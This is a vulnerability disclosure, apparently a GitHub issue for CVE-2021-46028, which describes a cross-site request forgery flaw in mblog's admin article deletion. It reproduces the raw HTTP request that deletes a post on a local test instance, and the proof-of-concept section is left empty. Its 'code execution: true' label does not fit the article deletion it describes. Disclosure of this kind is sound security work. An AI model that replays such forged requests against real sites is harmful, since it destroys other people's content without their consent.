Headline
CVE-2021-46028: There is a CSRF vulnerability exists in mblog<=3.5.0 · Issue #50 · langhsu/mblog
In mblog <= 3.5.0 there is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, the article will be deleted.
There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load.
Once the administrator clicks a malicious link, the article will be deleted.
[Vulnerability Type]
Cross-site request forgery (csrf)
[Vendor of Product]
https://github.com/langhsu/mblog
[Affected Component]
GET /admin/post/delete?id=6 HTTP/1.1
Host: 127.0.0.1:8082
sec-ch-ua: “Chromium";v="91", " Not;A Brand";v="99”
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8082/admin/post/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628653260; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629356854,1629356969; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629787797; UM_distinctid=17b76ec38b042b-043bd40aca20f-3373266-e1000-17b76ec38b13f6; CNZZDATA1255091723=1621369374-1629783007-http%253A%252F%252F127.0.0.1%253A8080%252F%7C1629783007; JSESSIONID=BcGdm-4poQD-nImmtzQx_gevDCZGrfxbmnirm5hb
Connection: close
[Attack Type]
Remote
[Impact Code execution]
true
POC: